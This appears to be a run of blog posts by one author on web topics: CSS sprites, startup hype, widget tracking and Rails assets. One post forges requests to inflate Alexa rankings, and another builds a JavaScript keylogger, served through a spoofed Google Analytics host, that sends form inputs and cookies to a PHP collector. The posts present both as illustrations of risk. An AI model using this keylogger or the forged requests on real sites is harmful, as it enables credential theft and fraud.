On places.ae, we use many small icons which add up to multiple downloads of images on our website. Every download takes time even though HTTP persistent connections are enabled. These timings can be minimzed using springs.

First off, we streamlined to use 16×16 pixel icons, so this allows us to make a nice square with several area’s of 16 by 16 pixels. Using GIMP you can help by enable the grid view, and setting the grid (in Image -> Configure grid) to 16 by 16 pixels, or 8 by 8, to determine the middle easier.

By adding all our icons into this image, we can reference to them using CSS:


/* sprite images */
.sprite {
background: url(/images/sprite.png) no-repeat;
width: 16px;
height: 16px;
float: left;
margin-right: 10px
}

.img_check { background-position: 0px -16px }
.img_error { background-position: -16px -16px }
.img_clock { background-position: -32px -16px }
.img_heart { background-position: -48px -16px }
.img_thumbsup { background-position: -64px -16px }
.img_thumbsdown { background-position: -80px -16px }

Finally, in our code, we can eliminate the many <img> tags, and use div’s:

<span class="sprite img_phone" />

Many may know this already, but I wanted to share this quick and easy introduction to sprites.

Color came little over a year ago, creating great promises towards sharing pictures with your fellow nearby smartphone users; rather than facebook’s lame and weird single perspective on life.

Fast forward a year, and unlike color, Instagram became a hot entrepreneurial topic; how can a iOS-only photo sharing application be acquired for 10 digits. It seems the latter remained humble and focused on the product, refrained from passing to many negative comments and so on, and it created a nice product, rather than creating a hype.

Another hype phenomenon can be seen in the indian tamilian movie 3, the movie of the internet meme “Kolaveri D”. Although the tamil song created a large hype, the movie seemed to be less successful. Much different to color, there was no arrogance or anything; the movie simply didn’t live up to the hype.

The iPhone 4S was a bit of a let down, not because it is a bad device, yet the world was expecting an iPhone 5. It (the world) created a hype.

Although I’m not really in any position to say how to run your business, but ease down on the hype. Create a kick-ass product, the hype will just be substituted by word of mouth. And that’s what you want.

The answer is a lot less mythical; it uses statistics from users who download the Alexa Toolbar (and fill in their gender, education, etc) and visit your website. It is commonly statistical sampling and has been done for the past 60 years for tv shows.

Being an engineer at heart, How does Alexa work? A little analysis at hand. Furthermore, with some scripting, you can boost your Alexa ratings quite a bit.

When the Alexa toolbar is downloaded, it creates a random 14 character identifier which identifies you as a unique user. The toolbar installation requires you to fill out some demographics, being gender, age group, race and so on. The unique identifier is replaced hereafter by: <RANDOM ID>

POST /php/demographics/index.php HTTP/1.1
Host: www.alexa.com
Referer: http://www.alexa.com/toolbar/success?session=<RANDOM ID>&plugin=alxf-2.14
Cookie: aid=<RANDOM ID>
Content-Type: application/x-www-form-urlencoded

amzn_id=&aid=<RANDOM ID>&browser=ff&plugin=alxf-2.14&gender=2&age=35-44&
income=60-90k&ethnicity=African+American&education=College&has_children=n&
install_location=work&zip=90210&version=6.5

This creates the demographics for a chosen <RANDOM ID>. You have a now a user “created” in the system which you can use for further data mining.

Subsequent requests, when somebody visits your website are done in form of GET requests to data.alexa.com, where clicks are recorded. The full URL is as follows:

http://data.alexa.com/data/<RANDOM ID>?cli=10&ver=alxf-2.14&dat=ns&
cdt=rq%3D11%26wid%3D13021%26s%3D200%26ttl%3D1000&ref=http%3A%2F%2Fwww.referer.com%2F&
url=http%3A%2F%2Fwww.yoursite.com%2Fdir%2Ffile.html

This request “logs” a request to www.yoursite.com/dir/file.html, coming from www.referer.com. It collects a few timestamp data as well to track how long users stay on your webpages, etc.

In essence, a web master could forge requests to this URL (in a <img> tag for example) to boost his/her site’s reputation on Alexa. To create a better varied audience, one could create several new “id’s” – dynamically using a script that performs the HTTP POST on the demographics gathering page – and include small html snippets to make ones site more popular. On top of this, knowing you can create your demographics, you can -virtually- make your site a lot more popular with a particulr gender, age group, race, etc.

In the end, you’re still serving your pages to users, it won’t attract any further visitors. You’re just faking that more users who visit your website also report this to Alexa – without them installing any toolbar.

Thank you,
Michael

A fake, android powered iPad in Dragon Mart.

Welcome the “widget”. A piece of html (with css, javascript..) to be included in another page, often to socially spread content (Facebook Like, Google +1, LinkedIN share, etc), or other added value (Analytics, sharing, etc) will tell many “providers” what content you are accessing.

It is difficult now to find a popular page without any widgets. Pages pack “like” buttons, “share this” widgets or tweet options to give you a instant way of sharing their content in your social network – banking on good ‘ole word of mouth marketing. If your friends like something, you might be interested also, even if it was only for peer pressure.

The problem that when something (such as the widget) is requested, browser data (such as your session’s information and the referer) also flow to the widget provider’s webserver. This provider will know what page you’re on and usually who you are (assuming you stay logged in into google, twitter, facebook, etc)

Thinking “but if I like a page, facebook will know it anyways“. This is true; the problem lies in the fact that providers know you’re accessing a page, regardless of performing any action (liking, sharing, etc). If you read X number of pages on a new model smartphone, chances are big you want to buy another one – and targeted ads become more… targeted.

From that advertising point of view, it creates mixed feelings. It’s like somebody overlooking your shoulder while you’re reading a magazine and changes the ads accordingly to which article you were staring at longer.

From a website owner point of view, this does create added value. If you can convince to have websites publish your widget code, you can track people’s interests, even before they ever came to your website. This (unidentifiable) user eventually ends up on your web app, identifies him/her self and you have great information. I’m just not sure how ethical this is, and even though Facebook’s outdated law enforcement guidelines don’t hold “webpages visited” in particular, they would have access to it.

Is this such a bad thing? Perhaps. “Widget providers” offer added value to website owners, who in turn decide what goes into their webpages. Vague idea, but maybe a browser extension could prevent the loading of these widgets, replacing them with a pseudo equivalent (fake buttons, etc) and only dynamically load the target script upon a click?

Food for thought. Now, look at the buttons below, they know you’ve been here already.

Although I just started on it, and haven’t seen all the goodness, one thing that raised my eyebrows is how static content a la CSS and JavaScript is handled, through an asset pipeline.

In a nutshell, since I’m doing the JQuery bit of the site now, wouldn’t it make much more sense to fetch the libraries from CDN’s, cache the remaining recurring libraries in Nginx (or Apache), and leaving the page specific bits in one big <script> tag, instead of pushing all in a bloated application.js page?

Then again, although I think Rails was what the web community needed, I always had my ideas about frameworks.

Thanks,
Michael

The Internet, as it is today, is a mash-up of JavaScript enabled services, often included from external websites. Internet companies offer so-called widgets, which are JavaScript tools that can be used in your own page. Popular examples of this are site analytics (Omniture, Google Analytics, etc) or share-abilities (AddThis, AddToAny, …). It’s by overwriting Javascript libraries on a page, that we can do other things, such as recording keystrokes.

“Overwriting” javascript libraries, or rather “inserting javascript” can be done in several ways. Cross Site Scripting is one of them, but for the sake of this blog post, I will act as a malicious proxy administrator, and overwrite the Google Analytics DNS entry (www.google-analytics.com) and “fake” the ga.js javascript file.

For this, you’d need only 2 files:

• Javascript keylogger
• PHP backend script

This javascript file, found here, holds 3 parts: JQuery, a base64 encoder and the keylogger code itself:

var t = "http://www.google-analytics.com/dump.php?a=";
jQuery(document).ready(function(){
  jQuery("form").submit(function(){
    var o = {};
    o.location = document.location.href;
    o.cookie = document.cookie;
    jQuery(":input").each(function(index){
      o[jQuery(this).attr("name")]=jQuery(this).val()
    });
    var u = t + Base64.encode(JSON.stringify(o));
    jQuery.getScript(u);
  });
});

Upon a “form submit” event, the current URL, the current cookie and all the page <input> fields are stored in a JSON object. This is Base64 encoded and passed on to a defined URL (http://www.google-analytics.com/dump.php?a= in this above case).

The data is pushed, in a Base64 encoded JSON object to an external script; dump.php in my case. This script (here) stores the current date, and a dump of all passed on variables in a defined text file.

  $obj = json_decode(base64_decode($_GET["a"]));
  $fileName = "dump.txt";
  $f = fopen($fileName, 'a');
  fwrite($f, "on ".date("d M y, h:i:s")."\n\n");
  foreach($obj as $i=>$j){ fwrite($f, $i." : ".$j."\n"); }
  fwrite($f, "-----------------------------------------------------\n");
  fclose($f);

Since it decodes a JSON object, dump.php will require JSON support, this can be installed using pear. Debian, it’s done using the following:

  apt-get install php-pear
  pear install Services_JSON

To verify this, you will see a JSON entry in the phpinfo() output.

When all is setup correctly (virtual host, /etc/hosts file changes, correct permissions for the dump.txt file to be created), all <form> submits should be recorded in the text file, in the form of:

on 06 Jun 11, 07:28:06
location : http://7days.ae/
cookie : SESS13752b3ab7d6...
name : user
pass : secret1552
_empty_ : Password
op :
form_build_id : form-00db26143485eac73953183a0e4170b6
form_id : search_form
search_theme_form : Search Keywords
default_text :

No, this is no hack against Google Analytics or 7days, the latter is something that would look slightly different.

Although this example uses Google Analytics, it could be used for many other “popular” javascripts that are included in terms of widgets. The handy things about Google Analytics is that it’s invisible to the user whether it is loaded or not.

Using a proxy server, even a transparent one can have its risks, this post just illustrates one of them. Always make sure you can trust your proxy administrators.

Thank you,
Michael

PS: these scripts are far from perfect, they don’t trap XHR requests and many other things, but it gets the point across.

It seems to be hacked by a particular W0LF Gh4m3d, a person who does several defacements without any political agenda. One of his/her hcks was “www.wijnabonnement.nl “, which actually translates into wine subscription, not a good thing putting a Saudi Arabian flag on there, is it?

The javascript fails around line 60 in themes/TFnewscast/js/custom.js:

jQuery('#main').kriesi_image_preloader({delay:100, callback:removeloader});

This can be fixed by surrounding it with a if statement that verifies that you’re not running IE nor opera:

if(!(jQuery.browser.opera || jQuery.browser.msie)){
  jQuery('#main').kriesi_image_preloader({delay:100, callback:removeloader});
}

And that should do it.

How can this be stopped? Modern websites include, because of widgets, several external Javascripts onto their own sites. When going to the gadget popular website engadget.com, a total of 17 hosts are contacted…

• engadget.com
• blogsmithmedia.com
• o.aolcdn.com
• platform.twitter.com
• b.engadget.com
• o.sa.aol.com
• h.scorecardresearch.com
• blogcdn.com
• platform0.twitter.com
• urls.api.twitter.com
• platform.twitter.com
• aolcdn.com
• facebook.com
• engadget2.disqus.com
• static.ak.fbcdn.net
• mediacdn.disqus.com
• disqus.com

Wouldn’t it be easier for an attacker to -perhaps- perform DNS poisoning to take over one of these hostnames, to include javascripts in multiple websites? With the [like] buttons, [retweet] buttons and [addthis] widgets, one could target many websites all at once.

Stopping this is partially performed by browsers, such as Firefox’s “this site downloads contents from xxxx.com, which contains malicious material”, but that’s only after a website is labelled as malicious. Could there be an answer where websites follow a “trusted list” (where sites register the widgets they use) type of model?

Just wondering on a thursday morning.